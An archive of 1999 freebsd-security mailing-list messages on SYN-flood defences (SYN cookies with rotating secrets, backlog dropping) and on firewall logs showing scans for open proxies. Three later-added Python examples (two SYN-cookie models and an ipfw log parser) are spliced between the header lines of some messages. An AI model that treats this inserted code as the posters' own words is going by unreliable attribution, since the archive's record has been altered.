>MD5-hash over the source- and destination IP and port and a
>secret which is incremented say every minute and using the result
>as a base for the own sequence number.
>
>You don't lose a socket before you get the third handshake
>packet and you can verify the sequence number using MD5 again.
>
>I found this idea to be quite interesting when reading about it
>the first time, and I currently don't see any negative side
>effects from it.
>
>The FreeBSD approach (just discarding the oldest socket in
>SYN_RCVD state when the backlog gets too high) works often enough
>as well, but might cause problems if the flooder sends you more
>SYNs than your backlog can handle in a shorter timeframe than
>your SYN|ACK needs for its way back to somebody who tries to
>establish a normal connection and his answer back to you takes.
>
>bye,
>  Harold
>
>--
>  Sleep is an abstinence syndrome which occurs due to lack of caffeine.
>Wed Mar 4 04:53:33 CET 1998 #unix, ircnet

From owner-freebsd-security Fri May 14 13: 7:51 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 88137150F5 for ; Fri, 14 May 1999 13:07:49 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id OAA27946; Fri, 14 May 1999 14:07:31 -0600 (MDT)
Message-Id: <4.2.0.37.19990514140618.046502a0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Fri, 14 May 1999 14:07:26 -0600
To: Don Lewis, Thamer Al-Herbish, security@FreeBSD.ORG
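The scheme Harold describes (MD5 over the four-tuple plus a secret advanced once a minute, recomputed on the third packet) together with the old-and-new-secret check Brett asks about, as an added example for this thread and not code from Linux, FreeBSD or any poster. The master secret, the four-tuple, the timestamps, and the derivation of a per-minute secret by appending an epoch counter to a master secret are constructed for illustration.

```python
"""Model of a SYN-cookie handshake with a secret that rotates once a minute.

The server commits no state on a SYN: its initial sequence number (ISN) is
MD5 over src/dst IP, src/dst port and the current secret. When the client's
ACK (third packet) arrives, ack-1 is recomputed the same way. Because the
secret may rotate between the SYN-ACK and the ACK, the ACK is checked
against the current and the previous secret, one MD5 per secret tried.
"""
import hashlib
import struct
from dataclasses import dataclass
from ipaddress import IPv4Address
from typing import Optional

SECRET_LIFETIME = 60   # seconds per secret "epoch": the thread's "incremented every minute"
ACCEPTED_EPOCHS = 2    # current secret plus the previous one (Brett's "old AND new")


@dataclass(frozen=True)
class FourTuple:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def current_epoch(now: float) -> int:
    """Secret counter at wall-clock time `now` (seconds)."""
    return int(now // SECRET_LIFETIME)


def epoch_secret(master: bytes, epoch: int) -> bytes:
    # Assumption for illustration, not Linux's derivation: one master secret
    # (which a kernel would draw from its entropy pool) plus the epoch counter.
    return master + struct.pack("!Q", epoch)


def cookie_isn(tup: FourTuple, master: bytes, epoch: int) -> int:
    """32-bit ISN = leading bytes of MD5(src IP, dst IP, src port, dst port, secret)."""
    data = (IPv4Address(tup.src_ip).packed
            + IPv4Address(tup.dst_ip).packed
            + struct.pack("!HH", tup.src_port, tup.dst_port)
            + epoch_secret(master, epoch))
    return int.from_bytes(hashlib.md5(data).digest()[:4], "big")


def on_syn(tup: FourTuple, master: bytes, now: float) -> int:
    """SYN received: return the ISN for the SYN-ACK. Nothing is stored."""
    return cookie_isn(tup, master, current_epoch(now))


def on_ack(tup: FourTuple, ack_num: int, master: bytes, now: float,
           accepted_epochs: int = ACCEPTED_EPOCHS) -> Optional[int]:
    """Third packet received. Returns the epoch whose secret validates the
    cookie (only now is a socket created), or None if the ACK is dropped."""
    expected_isn = (ack_num - 1) & 0xFFFFFFFF
    newest = current_epoch(now)
    for back in range(accepted_epochs):
        epoch = newest - back
        if cookie_isn(tup, master, epoch) == expected_isn:
            return epoch
    return None


def rotation_race(accepted_epochs: int) -> Optional[int]:
    """Handshake that straddles a secret rotation: SYN-ACK sent one second
    before the secret changes, client's ACK arriving three seconds later."""
    master = b"constructed-demo-secret"                       # constructed value
    tup = FourTuple("192.0.2.10", 40000, "198.51.100.5", 80)  # documentation addresses
    isn = on_syn(tup, master, now=119.0)                      # epoch 1
    return on_ack(tup, isn + 1, master, now=122.0,            # epoch 2
                  accepted_epochs=accepted_epochs)


if __name__ == "__main__":
    print("current secret only:", rotation_race(1))   # None: legitimate client dropped
    print("current + previous :", rotation_race(2))   # 1: accepted under the old secret
```

Checking only the newest secret drops the legitimate client whose SYN-ACK crossed the rotation; checking the previous one as well accepts it, while an ACK two rotations old, or one that does not match any issued cookie, is still rejected without any state having been committed.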
From: Brett Glass
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
In-Reply-To: <199905140546.WAA06542@salsa.gv.tsc.tdk.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 10:46 PM 5/13/99 -0700, Don Lewis wrote:
>One potential danger is that you can't totally block incoming connections
>to vulnerable ports by filtering out incoming SYN packets. If an attacker
>can guess what sequence number you would have sent in a SYN-ACK, he can
>establish a connection by just sending the third packet in the initial
>three-way handshake. This isn't especially easy to brute force because
>the sequence space is a 32 bit number, but it's not totally unreasonable
>either if the attacker is patient enough. The attacker may also be able
>to make better guesses if he knows the details of the implementation he is
>attacking.

It can be made pretty tough to guess if one has a good entropy pool.

--Brett

From owner-freebsd-security Fri May 14 13:18:29 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 999B914D34 for ; Fri, 14 May 1999 13:18:27 -0700 (PDT) (envelope-from shadows@whitefang.com)
Received: (qmail 6317 invoked from network); 14 May 1999 20:18:25 -0000
Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 14 May 1999 20:18:25 -0000
Date: Fri, 14 May 1999 13:17:26 -0700 (PDT)
From: Thamer Al-Herbish
To: security@FreeBSD.ORG
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
In-Reply-To: <4.2.0.37.19990514133829.0461e220@localhost>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 14 May 1999, Brett Glass wrote:

> One question about "the Linux way of doing it" as described
> below. What happens if the secret just happens to be modified
> right after the SYN-ACK? Could be you'd drop a connection or
> two that was legitimate. Seems like you'd need to test against
> an old AND a new secret to avoid the race condition, especially
> in the presence of congestion.

There were a few "trade offs" with the implementation. I have a copy
of the syn-cookies mailing list archive. Forgot where I originally
got it from:

http://www.whitefang.com/syn-cookies.txt

Oh and here's the obligatory question: has anyone already attempted
to write a cookie mechanism for fbsd?

--
Thamer Al-Herbish PGP public key:
shadows@whitefang.com http://www.whitefang.com/pgpkey.txt
[ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ]

From owner-freebsd-security Fri May 14 13:51:35 1999
Delivered-To: freebsd-security@freebsd.org
Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id B236E14EAD for ; Fri, 14 May 1999 13:51:15 -0700 (PDT) (envelope-from logix@foobar.franken.de)
Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id WAA22501; Fri, 14 May 1999 22:50:01 +0200 (CEST)
Message-ID: <19990514225001.A22317@foobar.franken.de>
Date: Fri, 14 May 1999 22:50:01 +0200
From: Harold Gutch
To: Brett Glass, Matthew Dillon
Cc: Jared Mauch, Thamer Al-Herbish, security@FreeBSD.ORG
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
References: <199905140438.VAA97604@apollo.backplane.com> <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> <199905140438.VAA97604@apollo.backplane.com> <19990514072546.A20779@foobar.franken.de> <4.2.0.37.19990514133829.0461e220@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <4.2.0.37.19990514133829.0461e220@localhost>; from Brett Glass on Fri, May 14, 1999 at 02:05:51PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, May 14, 1999 at 02:05:51PM -0600, Brett Glass wrote:
> Any technique that requires the originator to receive your
> SYN-ACK and generate a specific response before you commit
> resources is acceptable. Heck, you don't even really need
> a cryptographically strong hash for this. Is Linux really
> doing one MD5 per SYN? If so, I can think of a few other
> techniques that would give us a speed advantage. We'd be
> able to beat them in the benchmarks while still providing
> good protection against SYN flooding.
>
Ah, that's a very good point, I never thought of the speed question.

> One question about "the Linux way of doing it" as described
> below. What happens if the secret just happens to be modified
> right after the SYN-ACK? Could be you'd drop a connection or
> two that was legitimate. Seems like you'd need to test against
> an old AND a new secret to avoid the race condition, especially
> in the presence of congestion.
>
Yes, I'd guess so - I haven't had a look at the code itself, so I
don't know whether this is actually done, but I'd guess so.

> One more point. According to the original BUGTRAQ message,
> a cleanup routine is causing problems when the system is
> under heavy load. At first glance, this looks like a
> consistency problem; the code may be traversing a data structure
> that changes out from under it. We need to fix this regardless
> of how we handle SYN floods.
>
This is certainly true, I have no idea why the subject of this thread
changed to "How to handle SYN floods" this quickly. I just happen to
have read the Linux mailing-list archives about "their" way to handle
SYN floods only a few weeks ago, found it fairly interesting, so I
wondered if there were any actual negative points about it.

But you are right - back to the original topic. I checked my 2.2.8
boxes and flooded them with 1 Million SYN packets taking about 1
minute, so that's (roughly) 16000 SYNs per second. I did not manage to
kill them with this.

bye,
  Harold

--
  Sleep is an abstinence syndrome which occurs due to lack of caffeine.
Wed Mar 4 04:53:33 CET 1998 #unix, ircnet

From owner-freebsd-security Fri May 14 13:57:47 1999
Delivered-To: freebsd-security@freebsd.org
Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id 617C914EAD for ; Fri, 14 May 1999 13:57:37 -0700 (PDT) (envelope-from logix@foobar.franken.de)
Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id WAA22522; Fri, 14 May 1999 22:57:27 +0200 (CEST)
Message-ID: <19990514225726.B22317@foobar.franken.de>
Date: Fri, 14 May 1999 22:57:26 +0200
From: Harold Gutch
To: Thamer Al-Herbish, security@FreeBSD.ORG
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
References: <4.2.0.37.19990514133829.0461e220@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: ; from Thamer Al-Herbish on Fri, May 14, 1999 at 01:17:26PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, May 14, 1999 at 01:17:26PM -0700, Thamer Al-Herbish wrote:
> On Fri, 14 May 1999, Brett Glass wrote:
>
> > One question about "the Linux way of doing it" as described
> > below. What happens if the secret just happens to be modified
> > right after the SYN-ACK? Could be you'd drop a connection or
> > two that was legitimate. Seems like you'd need to test against
> > an old AND a new secret to avoid the race condition, especially
> > in the presence of congestion.
>
> There were a few "trade offs" with the implementation. I have a copy
> of the syn-cookies mailing list archive. Forgot where I originally
> got it from:
>
> http://www.whitefang.com/syn-cookies.txt
>
I had a look at the archives a few weeks back, just having a quick look
at most of the mails. I guess I must have missed those trade offs when
reading it not too precisely - I'll check them again.

> Oh and here's the obligatory question: has anyone already attempted
> to write a cookie mechanism for fbsd?
>
I considered doing so, but seeing that FreeBSD already takes an
(arguable) approach against SYN floods stopped me even thinking of
something like that pretty quickly. FreeBSD basically drops sockets in
SYN_RCVD state if too many of them are open and another SYN packet
arrives, making place for this new socket.

bye,
  Harold

--
  Sleep is an abstinence syndrome which occurs due to lack of caffeine.
Wed Mar 4 04:53:33 CET 1998 #unix, ircnet

From owner-freebsd-security Fri May 14 14:59:12 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 7FEBF151EB for ; Fri, 14 May 1999 14:59:09 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id PAA28917; Fri, 14 May 1999 15:58:30 -0600 (MDT)
Message-Id: <4.2.0.37.19990514154319.04610b80@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Fri, 14 May 1999 15:46:19 -0600
To: Harold Gutch, Matthew Dillon
From: Brett Glass
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
Cc: Jared Mauch, Thamer Al-Herbish, security@FreeBSD.ORG
In-Reply-To: <19990514225001.A22317@foobar.franken.de>

At 10:50 PM 5/14/99 +0200, Harold Gutch wrote:
>On Fri, May 14, 1999 at 02:05:51PM -0600, Brett Glass wrote:
> > Any technique that requires the originator to receive your
> > SYN-ACK and generate a specific response before you commit
> > resources is acceptable. Heck, you don't even really need
> > a cryptographically strong hash for this. Is Linux really
> > doing one MD5 per SYN? If so, I can think of a few other
> > techniques that would give us a speed advantage. We'd be
> > able to beat them in the benchmarks while still providing
> > good protection against SYN flooding.
> >
>Ah, that's a very good point, I never thought of the
>speed-question.

Actually, it turns out that the Linux approach requires a minimum of
two MD5's -- one at the time of the SYN and again when the SYNner
responds to the SYN-ACK. I think there are a total of three in their
algorithm. This gives us a chance to gain a LOT of speed if we can
avoid doing all those MD5s.

>But you are right - back to the original topic. I checked my
>2.2.8 boxes and flooded them with 1 Million SYN packets taking
>about 1 minute, so that's (roughly) 16000 SYNs per second. I did
>not manage to kill them with this.

It may also depend on the complexity of your routing tables.
--Brett

From owner-freebsd-security Fri May 14 15:13:22 1999
Message-ID: <19990515001018.A22645@foobar.franken.de>
Date: Sat, 15 May 1999 00:10:18 +0200
From: Harold Gutch
To: Brett Glass, Matthew Dillon
Cc: Jared Mauch, Thamer Al-Herbish, security@FreeBSD.ORG
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
In-Reply-To: <4.2.0.37.19990514154319.04610b80@localhost>; from Brett Glass on Fri, May 14, 1999 at 03:46:19PM -0600

On Fri, May 14, 1999 at 03:46:19PM -0600, Brett Glass wrote:
> At 10:50 PM 5/14/99 +0200, Harold Gutch wrote:
> >On Fri, May 14, 1999 at 02:05:51PM -0600, Brett Glass wrote:
> > > Any technique that requires the originator to receive your
> > > SYN-ACK and generate a specific response before you commit
> > > resources is acceptable. Heck, you don't even really need
> > > a cryptographically strong hash for this. Is Linux really
> > > doing one MD5 per SYN? If so, I can think of a few other
> > > techniques that would give us a speed advantage. We'd be
> > > able to beat them in the benchmarks while still providing
> > > good protection against SYN flooding.
> > >
> >Ah, that's a very good point, I never thought of the
> >speed-question.
> 
> Actually, it turns out that the Linux approach requires
> a minimum of two MD5's -- one at the time of the SYN
> and again when the SYNner responds to the SYN-ACK. I
> think there are a total of three in their algorithm.
> This gives us a chance to gain a LOT of speed if we
> can avoid doing all those MD5s.
> 
Why should we do anything at all? Our current tactic (simply dropping
sockets in SYN_RCVD state) if a certain backlog fills up and another
SYN comes in seems to work quite well. You'll get in trouble though if
the flooder manages to flush through the complete backlog in a
timeframe shorter than the 2nd and the 3rd packet of the handshake
take for the way back to the client and back to the server again.
Perhaps dropping a random socket is a better approach...

> >But you are right - back to the original topic. I checked my
> >2.2.8 boxes and flooded them with 1 Million SYN packets taking
> >about 1 minute, so that's (roughly) 16000 SYNs per second. I did
> >not manage to kill them with this.
> 
> It may also depend on the complexity of your routing tables.
> 
1 loopback-route, 2 host routes, 2 network routes and a default-route.
Not much, but I could add a number of bogus routes and try to crash
the box then by SYN-flooding it.

How many routes should I add?

bye,
  Harold

-- 
Sleep is an abstinence syndrome which occurs due to lack of caffeine.
Wed Mar 4 04:53:33 CET 1998  #unix, ircnet

From owner-freebsd-security Fri May 14 15:15:41 1999
Message-Id: <4.2.0.37.19990514161228.046541f0@localhost>
Date: Fri, 14 May 1999 16:14:48 -0600
To: Harold Gutch, Matthew Dillon
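The stateless alternative to the SYN_RCVD backlog that Harold describes, with the secret-rotation race Brett raised earlier in the thread handled by checking the current and the previous secret, as an added example that is not code from the thread or from any FreeBSD or Linux implementation. The ISN layout (5-bit time counter, 3-bit MSS index, 24-bit MAC), the MSS table, the MAX_AGE window, the HMAC-SHA256 MAC and the addresses are this example's own assumptions; the Linux code discussed above used MD5, and the two-secret check does not depend on which hash is chosen:

```python
import hashlib
import hmac

COUNTER_BITS = 5                     # top 5 bits of the ISN: coarse time counter, mod 32
MSS_BITS = 3                         # next 3 bits: index into MSS_TABLE
MAC_BITS = 24                        # low 24 bits: truncated keyed MAC
MAX_AGE = 4                          # accept a cookie at most this many counter ticks old
MSS_TABLE = (536, 1024, 1460, 4312)  # MSS values we can reconstruct (up to 8 fit in 3 bits)
_COUNTER_MASK = (1 << COUNTER_BITS) - 1
_MAC_MASK = (1 << MAC_BITS) - 1


def _mac24(secret, saddr, daddr, sport, dport, counter):
    """Keyed MAC over the connection 4-tuple and the counter, truncated to 24 bits."""
    msg = f"{saddr}|{sport}|{daddr}|{dport}|{counter}".encode()
    return hmac.new(secret, msg, hashlib.sha256).digest()[:3]


class SynCookies:
    """SYN handling with no per-connection state before the third packet:
    everything needed to rebuild the connection is encoded in the SYN-ACK's ISN."""

    def __init__(self, secret):
        self.current = secret
        self.previous = None      # kept so handshakes in flight across a rotation still pass

    def rotate(self, new_secret):
        self.previous, self.current = self.current, new_secret

    def make(self, saddr, daddr, sport, dport, mss, now):
        """ISN to send in the SYN-ACK for an incoming SYN; 'now' is a coarse clock tick."""
        counter = now & _COUNTER_MASK
        mss_idx = 0               # largest table entry not above the peer's MSS
        for i, m in enumerate(MSS_TABLE):
            if m <= mss:
                mss_idx = i
        mac = int.from_bytes(_mac24(self.current, saddr, daddr, sport, dport, counter), "big")
        return (counter << (MSS_BITS + MAC_BITS)) | (mss_idx << MAC_BITS) | mac

    def validate(self, saddr, daddr, sport, dport, ack, now):
        """Check the ACK of the third packet; returns the encoded MSS, or None to drop."""
        isn = (ack - 1) & 0xFFFFFFFF
        counter = isn >> (MSS_BITS + MAC_BITS)
        mss_idx = (isn >> MAC_BITS) & ((1 << MSS_BITS) - 1)
        presented = (isn & _MAC_MASK).to_bytes(3, "big")
        if ((now - counter) & _COUNTER_MASK) > MAX_AGE:   # too old (or from the future)
            return None
        if mss_idx >= len(MSS_TABLE):                     # cannot be one of ours
            return None
        for secret in (self.current, self.previous):      # new AND old secret
            if secret is not None and hmac.compare_digest(
                    _mac24(secret, saddr, daddr, sport, dport, counter), presented):
                return MSS_TABLE[mss_idx]
        return None
```

Nothing is allocated until an ACK validates, which is the "receive the SYN-ACK and generate a specific response before you commit resources" property Brett asked for; the state that the backlog used to hold is rebuilt from the ISN. The 24-bit MAC and the age window together bound how long a guessed cookie would stay usable, and the per-packet MAC cost is the trade-off Brett's MD5 count is about: the two-secret check adds at most one extra MAC on the ACK path, and only during the window after a rotation.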
From: Brett Glass
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
Cc: Jared Mauch, Thamer Al-Herbish, security@FreeBSD.ORG
In-Reply-To: <19990515001018.A22645@foobar.franken.de>

At 12:10 AM 5/15/99 +0200, Harold Gutch wrote:
>Why should we do anything at all? Our current tactic (simply
>dropping sockets in SYN_RCVD state) if a certain backlog fills up
>and another SYN comes in seems to work quite well. You'll get in
>trouble though if the flooder manages to flush through the
>complete backlog in a timeframe shorter than the 2nd and the 3rd
>packet of the handshake take for the way back to the client and
>back to the server again.

You can still mount an effective DoS with a SYN flood by killing a
LARGE percentage of the new connections to the box.

> It may also depend on the complexity of your routing tables.
> 
>1 loopback-route, 2 host routes, 2 network routes and a
>default-route. Not much, but I could add a number of bogus routes
>and try to crash the box then by SYN-flooding it.
>
>How many routes should I add?

I'm not sure. It also may depend on whether the table is in flux. See
the original BUGTRAQ message which points out the bug.

--Brett

From owner-freebsd-security Sat May 15 13:42:05 1999
To: Kris Kennaway
Cc: Matthew Dillon, danny, freebsd-security@freebsd.org
Subject: Re: network scan?
In-reply-to: Your message of "Thu, 13 May 1999 12:18:16 +0930."
Date: Sun, 16 May 1999 04:41:56 +0800
From: Peter Wemm
Message-Id: <19990515204158.C390F1F58@spinner.netplex.com.au>

Kris Kennaway wrote:
> On Wed, 12 May 1999, Matthew Dillon wrote:
> 
> > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359
> > :a.b.c.1:1080 in via ed0
> > :...
> > 
> > I get this all the time from people scanning for netbios. I
> > usually just ignore them. If I'm in a bad mood I send a nasty gram
> > to the originating network.
> 
> In this case they're looking for an open SOCKS proxy (so they can use it to
> bounce attacks against other machines, most likely). I usually do what Matt
> does as well - if they're scanning really heavily then I might slap a blanket
> ban on their IP address(es). Don't forget though that TCP connection
> initiations (i.e. the initial step of the 3-way handshake) can be forged if
> they're designed to just bounce off your firewall (i.e. not actually connect
> to anything which may be listening) - so watch out for cutting off
> connectivity to a legitimate client.

In this particular case, it's a site in China. They have a heavily
censored internet gateway, and I see lots of probes from china (and other
areas in Asia that have enforced proxy use and heavily censored feeds)
looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other
proxies including netscape). They are scanning for relays to bounce
connections off to bypass the censored feed.

A few key points from traceroute:
16  cust-gw.Teleglobe.net (207.45.214.210)  500.028 ms
..
20  beijing-xgw-lan.cernet.net (202.112.1.210)  1042.496 ms  1042.076 ms
24  guangzhou-rgw-lan.cernet.net (202.112.1.78)  1554.514 ms  1562.112 ms

They are not being malicious, just desperate. Most (but not all) cases
that I've seen from china are looking for news (journalistic, not usenet)
sites in their initial scans.

Sigh, the shape of things to come for *.au too perhaps.. :-(

Cheers,
-Peter

From owner-freebsd-security Sat May 15 17:10:16 1999
Message-ID: <373E0CB2.D98C9E75@softweyr.com>
Date: Sat, 15 May 1999 18:09:22 -0600
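A way to turn ipfw deny lines like the one Matt quoted into a per-source report, as an added example that is not part of the thread. It parses the log format shown above, groups denied inbound TCP by source, and flags a source as a probable proxy scan only when it hits 1080, 3128 or 8080 on several hosts; the sample lines, the addresses (RFC 5737 documentation ranges), the min_targets threshold and the port table are constructed for the example:

```python
import re
from collections import defaultdict

# ipfw log format as it appears in the thread:
#   ipfw: 26000 Deny TCP 202.38.248.205:4359 a.b.c.1:1080 in via ed0
IPFW_RE = re.compile(
    r"ipfw: (?P<rule>\d+) (?P<action>\w+) (?P<proto>\w+) "
    r"(?P<src>[\w.]+):(?P<sport>\d+) (?P<dst>[\w.]+):(?P<dport>\d+) "
    r"(?P<dir>in|out) via (?P<iface>\w+)"
)
PROXY_PORTS = {1080: "socks", 3128: "squid", 8080: "http-proxy"}

# Constructed sample log; the addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 203.0.113.5:4359 192.0.2.1:1080 in via ed0
May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 203.0.113.5:4360 192.0.2.2:1080 in via ed0
May 12 18:42:25 server /kernel: ipfw: 26000 Deny TCP 203.0.113.5:4361 192.0.2.3:3128 in via ed0
May 12 18:42:25 server /kernel: ipfw: 26000 Deny TCP 203.0.113.5:4362 192.0.2.3:8080 in via ed0
May 12 18:50:01 server /kernel: ipfw: 26000 Deny TCP 198.51.100.9:1025 192.0.2.1:25 in via ed0
May 12 18:51:13 server /kernel: ipfw: 26100 Deny UDP 198.51.100.9:53 192.0.2.1:53 in via ed0
May 12 18:52:00 server /kernel: ipfw: 26000 Deny TCP 198.51.100.77:2000 192.0.2.1:8080 in via ed0
not an ipfw line at all
"""


def parse_line(line):
    """Return the fields of one ipfw log line as a dict, or None for anything else."""
    m = IPFW_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    for key in ("rule", "sport", "dport"):
        rec[key] = int(rec[key])
    return rec


def summarize(lines, min_targets=3):
    """Group denied inbound TCP by source and classify each source."""
    by_src = defaultdict(lambda: {"ports": set(), "hosts": set(), "count": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["action"] != "Deny" or rec["proto"] != "TCP" or rec["dir"] != "in":
            continue
        entry = by_src[rec["src"]]
        entry["ports"].add(rec["dport"])
        entry["hosts"].add(rec["dst"])
        entry["count"] += 1
    report = {}
    for src, entry in by_src.items():
        proxy_ports = sorted(p for p in entry["ports"] if p in PROXY_PORTS)
        # a single hit on 8080 is not a scan; several hosts probed on proxy ports is
        verdict = "proxy-scan" if proxy_ports and len(entry["hosts"]) >= min_targets else "other"
        report[src] = {"count": entry["count"], "hosts": len(entry["hosts"]),
                       "proxy_ports": proxy_ports, "verdict": verdict}
    return report


if __name__ == "__main__":
    for src, info in summarize(SAMPLE_LOG.splitlines()).items():
        print(f"{src:16} {info['verdict']:11} hits={info['count']} hosts={info['hosts']} "
              f"proxy_ports={info['proxy_ports']}")
```

Kris's caveat applies to anything built on top of this: the source address of a bare SYN that never completes a handshake is unverified, so the report is input for a human decision about a blanket ban, not an automatic block list.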
From: Wes Peters
Organization: Softweyr LLC
To: Peter Wemm
Cc: Kris Kennaway, Matthew Dillon, danny, freebsd-security@FreeBSD.ORG
Subject: Re: network scan?

Peter Wemm wrote:
> 
> Kris Kennaway wrote:
> > On Wed, 12 May 1999, Matthew Dillon wrote:
> > 
> > > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359
> > > :a.b.c.1:1080 in via ed0
> > > :...
> > > 
> > > I get this all the time from people scanning for netbios. I
> > > usually just ignore them. If I'm in a bad mood I send a nasty gram
> > > to the originating network.
> > 
> > In this case they're looking for an open SOCKS proxy (so they can use it to
> > bounce attacks against other machines, most likely). I usually do what Matt
> > does as well - if they're scanning really heavily then I might slap a blanket
> > ban on their IP address(es). Don't forget though that TCP connection
> > initiations (i.e. the initial step of the 3-way handshake) can be forged if
> > they're designed to just bounce off your firewall (i.e. not actually connect
> > to anything which may be listening) - so watch out for cutting off
> > connectivity to a legitimate client.
> 
> In this particular case, it's a site in China. They have a heavily
> censored internet gateway, and I see lots of probes from china (and other
> areas in Asia that have enforced proxy use and heavily censored feeds)
> looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other
> proxies including netscape). They are scanning for relays to bounce
> connections off to bypass the censored feed.

This sounds like an opportunity for someone with a FreeBSD machine and
good network connectivity to make themselves a hero. I imagine you'll
have to be agile about network addresses if the censors are any good
at all.

> They are not being malicious, just desperate. Most (but not all) cases
> that I've seen from china are looking for news (journalistic, not usenet)
> sites in their initial scans.

An anonymous gateway service to sites like cnn.com and abcnews.com
might go a long way to helping some of these people. I don't have
the connectivity (yet), but I may have soon; TCI will finally get
digital cable to me day after tomorrow, and @Home shouldn't be too
far away.

Can anyone else throw up a "public proxy" on a standalone machine?

> Sigh, the shape of things to come for *.au too perhaps.. :-(

And to think my Australian friends criticize me for saying the US
Constitution was divinely inspired.

-- 
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                Softweyr LLC
http://www.softweyr.com/~softweyr                      wes@softweyr.com

From owner-freebsd-security Sat May 15 19:27:53 1999
Message-ID: <19990516042657.A28280@foobar.franken.de>
Date: Sun, 16 May 1999 04:26:57 +0200
From: Harold Gutch
To: Peter Wemm, Kris Kennaway
Cc: Matthew Dillon, danny, freebsd-security@FreeBSD.ORG
Subject: Re: network scan?
In-Reply-To: <19990515204158.C390F1F58@spinner.netplex.com.au>; from Peter Wemm on Sun, May 16, 1999 at 04:41:56AM +0800

On Sun, May 16, 1999 at 04:41:56AM +0800, Peter Wemm wrote:
> Kris Kennaway wrote:
> > On Wed, 12 May 1999, Matthew Dillon wrote:
> > 
> > > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359
> > > :a.b.c.1:1080 in via ed0
> > > :...
> > > 
> > > I get this all the time from people scanning for netbios. I
> > > usually just ignore them. If I'm in a bad mood I send a nasty gram
> > > to the originating network.
> > 
> > In this case they're looking for an open SOCKS proxy (so they can use it to
> 
> In this particular case, it's a site in China. They have a heavily
> censored internet gateway, and I see lots of probes from china (and other
> areas in Asia that have enforced proxy use and heavily censored feeds)
> looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other
> proxies including netscape). They are scanning for relays to bounce
> connections off to bypass the censored feed.
> 
Just to make sure I'm getting this right - you're saying China has a
censored internet gateway (i.e. blocking *something* [what exactly?]),
but they do allow connections to ports 1080, 3128 and 8080?

bye,
  Harold

-- 
Sleep is an abstinence syndrome which occurs due to lack of caffeine.
Wed Mar 4 04:53:33 CET 1998  #unix, ircnet

From owner-freebsd-security Sat May 15 21:18:21 1999
Message-ID: <373E46FD.72E41F3F@softweyr.com>
Date: Sat, 15 May 1999 22:18:05 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Harold Gutch
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: network scan?

Harold Gutch wrote:
> 
> On Sun, May 16, 1999 at 04:41:56AM +0800, Peter Wemm wrote:
> > Kris Kennaway wrote:
> > > On Wed, 12 May 1999, Matthew Dillon wrote:
> > > 
> > > > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359
> > > > :a.b.c.1:1080 in via ed0
> > > > :...
> > > > 
> > > > I get this all the time from people scanning for netbios. I
> > > > usually just ignore them. If I'm in a bad mood I send a nasty gram
> > > > to the originating network.
> > > 
> > > In this case they're looking for an open SOCKS proxy (so they can use it to
